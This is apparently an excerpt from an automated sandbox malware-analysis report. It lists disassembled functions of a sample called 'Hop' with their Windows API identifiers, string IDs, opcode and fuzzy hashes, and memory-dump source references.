                                                                                                                                                                                                                                                                                                          • String ID: $SysTabControl32
                                                                                                                                                                                                                                                                                                          • API String ID: 2080134422-3143400907
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
                                                                                                                                                                                                                                                                                                          • Instruction ID: 219a152ab9e1e0badfaf13c6edc1a2cd98d133151cd9bf90cba5f9cf6378c1b6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8313B725097C1CAE760CF25A44475AB7A0F784BB4F144339EAA957AD8CB3DD495CF00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46DAC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileHandleType
                                                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                                                          • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1a302059a24ef4730bf8bcb634e8bdb7dbb9c345eed5e02179e57bc52688c5e8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3c9b01793386ecdf54a50760fef14870e12fb4074ce8f9b7189c5b97aa28674d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a302059a24ef4730bf8bcb634e8bdb7dbb9c345eed5e02179e57bc52688c5e8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60214F22A0CA82C1FB648B3594945392A51FF45B78F291339D76E877DCCE3AD8C1D381
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DA938 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                                                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                                          • Opcode ID: e5c794eae5f48c2ef7f2f6a3d8fc67ccb9001089f9c2a959ce90b06ca3cf1746
                                                                                                                                                                                                                                                                                                          • Instruction ID: cc086e1e61bde78b5d5d2d145fe93061c445963873bac6eb6a7d1e264c58b4a9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5c794eae5f48c2ef7f2f6a3d8fc67ccb9001089f9c2a959ce90b06ca3cf1746
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37311936A08785CBD724CF29E444B5AB7A5FB88790F104239EB9943B99CF78E451CF00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DA0DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                          • String ID: Combobox
                                                                                                                                                                                                                                                                                                          • API String ID: 1025951953-2096851135
                                                                                                                                                                                                                                                                                                          • Opcode ID: 419ce087720c7b5737b5b73e28fc957c16fa632f6a553db8683be6f9ef87a6ec
                                                                                                                                                                                                                                                                                                          • Instruction ID: ee5b0e94cbc378bce347616299f28f39f24d55ec46d19c245845dbe4583594a0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 419ce087720c7b5737b5b73e28fc957c16fa632f6a553db8683be6f9ef87a6ec
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60310B32609781CAE770DF24A440B5AB7A1FB857A4F544239EAA943B99CF3DD981CF40
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DA448 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                                                                                                          • String ID: edit
                                                                                                                                                                                                                                                                                                          • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5492c754c9bff498288acdc113c590e82b98b645c49f858c44027990a109cd19
                                                                                                                                                                                                                                                                                                          • Instruction ID: 76eb3282d25e9cce24c52062f1c954467da16c6c51587405565af8946027d72a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5492c754c9bff498288acdc113c590e82b98b645c49f858c44027990a109cd19
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94311E359087C1CAE760DB15A45475A77A1FB887A4F144239EAAC43B99DF3CD881CF01
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46FC20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _handle_error
                                                                                                                                                                                                                                                                                                          • String ID: "$pow
                                                                                                                                                                                                                                                                                                          • API String ID: 1757819995-713443511
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2a5c1d25bf9eaccf3d95b4360943358a5a34a98ae302652ad79e849c14545523
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3c576607d4b91a008813b7ba888ff2fd0b2a07f091fd4f2eaec28f82da5ebe80
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a5c1d25bf9eaccf3d95b4360943358a5a34a98ae302652ad79e849c14545523
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7821EB72D1CA85C6F360CF10E444A6AAAA0FFDA348F201329E7CA46958DBBDD185DB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4E0624 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3712363035-3916222277
                                                                                                                                                                                                                                                                                                          • Opcode ID: cc2544113331effc305b0a03fe3b3a35c1ebbb01cab2a7be9a8f7d8f60356f9c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 435de05fe20a20fa8faa949c5b27a605101f79b3d789a81c59f2f4d16516bf0c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc2544113331effc305b0a03fe3b3a35c1ebbb01cab2a7be9a8f7d8f60356f9c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9113071A08B41D6EB10CF16F91065AB7E5FF88784F445139EA4D87A65CF3DD0A4CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C471444 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                                                                                                                                                                                          • String ID: !$tan
                                                                                                                                                                                                                                                                                                          • API String ID: 3384550415-2428968949
                                                                                                                                                                                                                                                                                                          • Opcode ID: 353651fcbdf869610a9aa7174845b6b37f2108fed80d9f7b1c03092e70d52472
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6556f857a204cb0e54cfe17a0b21defe9d065288fdd36efd59a3d91cfb39a161
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 353651fcbdf869610a9aa7174845b6b37f2108fed80d9f7b1c03092e70d52472
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F01B931A18B8981DA14CF12A41033A62A1FFDA7D8F505338EA9E17B88EF7CD190DB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C47138C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                                                                                                                                                                                          • String ID: !$sin
                                                                                                                                                                                                                                                                                                          • API String ID: 3384550415-1565623160
                                                                                                                                                                                                                                                                                                          • Opcode ID: baa30cb22590ecb22bb061425c7c6612d2a3b082cca11217b3942b55bf4d3348
                                                                                                                                                                                                                                                                                                          • Instruction ID: d528f7842bb95a696132282bd04e7e52c6c429a5e003e3fd0bf151f8bb96e166
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: baa30cb22590ecb22bb061425c7c6612d2a3b082cca11217b3942b55bf4d3348
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4401D872E18B8981D614CF22E40037A6261BF9A7D8F504338E95E1BB88EF7CD0919700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C471378 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                                                                                                                                                                                          • String ID: !$cos
                                                                                                                                                                                                                                                                                                          • API String ID: 3384550415-1949035351
                                                                                                                                                                                                                                                                                                          • Opcode ID: a332118c418a9a5553ba94b25f2e8775fa0e5e0d6883273b594770b1dd192514
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5974dcdfa3b5a959db04b47bfe362e7864dbc87aabe71c8a669051422bf52cc5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a332118c418a9a5553ba94b25f2e8775fa0e5e0d6883273b594770b1dd192514
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1301D872E18B8981D614CF22A4003766261FF9A7D8F504328E95E1BBC9EF7CD0919B00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C471200 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _handle_error
                                                                                                                                                                                                                                                                                                          • String ID: "$exp
                                                                                                                                                                                                                                                                                                          • API String ID: 1757819995-2878093337
                                                                                                                                                                                                                                                                                                          • Opcode ID: ca465fa898a567bf7fb695c7da4f831c21791187771085b507e6f3573d05dac5
                                                                                                                                                                                                                                                                                                          • Instruction ID: dea28291ea7f1e7ac3bcb753d41d7d58c0cf41b5ebb5d13c820b181c86e2d7a6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca465fa898a567bf7fb695c7da4f831c21791187771085b507e6f3573d05dac5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60016536928A88C6E720CF2494496AA7671FFEA748F201319E74526664CB7DD4C5DB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C457450 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • try_get_function.LIBVCRUNTIME ref: 00007FF68C457479
                                                                                                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(?,?,?,00007FF68C4570D1,?,?,?,?,00007FF68C45649C,?,?,?,?,00007FF68C454B1B), ref: 00007FF68C457490
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Valuetry_get_function
                                                                                                                                                                                                                                                                                                          • String ID: FlsSetValue
                                                                                                                                                                                                                                                                                                          • API String ID: 738293619-3750699315
                                                                                                                                                                                                                                                                                                          • Opcode ID: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                                                                                                                                                                                                                                                                                                          • Instruction ID: f398c3739c023a2cd6051527a9fe00292202ea138d5c2c889a93bd815ebff249
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5E065A1E18902C2EA15CB96E4004F93261BF487A8F59413DDA1D873D5CE7CE8D4C350
                                                                                                                                                                                                                                                                                                          Function 00007FF68C455468 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF68C455471
                                                                                                                                                                                                                                                                                                          • _CxxThrowException.LIBVCRUNTIME ref: 00007FF68C455482
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C456EA8: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68C455487), ref: 00007FF68C456F1D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C456EA8: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68C455487), ref: 00007FF68C456F4F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
